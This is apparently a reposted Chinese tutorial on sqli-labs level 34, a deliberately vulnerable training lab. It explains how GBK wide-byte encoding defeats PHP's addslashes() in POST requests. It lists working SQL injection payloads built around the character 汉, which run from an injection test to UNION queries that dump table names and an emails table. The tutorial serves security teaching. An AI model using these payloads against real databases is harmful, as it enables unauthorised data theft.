文章总结： sqli-labs第34关演示POST场景下GBK编码仍击穿addslashes()：PHP把0xDF27转义成0xDF5C27，MySQL按GBK将0xDF5C解析为汉字，反斜杠被吃掉，单引号逃逸；需用Burp在原始字节流写入0DF27才能触发，后续显错、UNION注入步骤与GET一致，验证注入成败取决于字节而非传参方式。 综合评分： 82 文章分类： WEB安全,漏洞分析,渗透测试,实战经验,CTF

)

我也学习到部分技术前辈通过此关卡的方法，也很奇妙，利用中文——汉，我这里做简单的展示：

判断是否存在注入汉' or 1=1 -- 判断字段数汉' orderby2-- 判断显示位汉' union select 1,2 --
判断库名汉' union select database(),version() -- 判断表名汉' union select 1,table_name from information_schema.tables where table_schema=database() --  汉' union select 1,table_name from information_schema.tables where table_schema=database() -- 获取数据汉' union select id,2 from emails --

已关注

关注

重播 分享 赞

关闭

观看更多

更多

退出全屏

切换到竖屏全屏退出全屏

武文学网安已关注

分享视频

，时长00:53

0/0

00:00/00:53

切换到横屏模式

继续播放

[ ]

进度条，百分之0

播放

00:00

/

00:53

00:53

倍速

全屏

倍速播放中

0.5倍 0.75倍 1.0倍 1.5倍 2.0倍

超清 流畅

继续观看

从GET到POST：addslashes()绕过的本质突破——sqli-labs 34 关实战

观看更多

转载

,

从GET到POST：addslashes()绕过的本质突破——sqli-labs 34 关实战

武文学网安已关注

分享点赞在看

已同步到看一看写下你的评论

视频详情

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：武文学网安 武文学网安 武文学网安《从GET到POST：addslashes()绕过的本质突破——sqli-labs 34 关实战》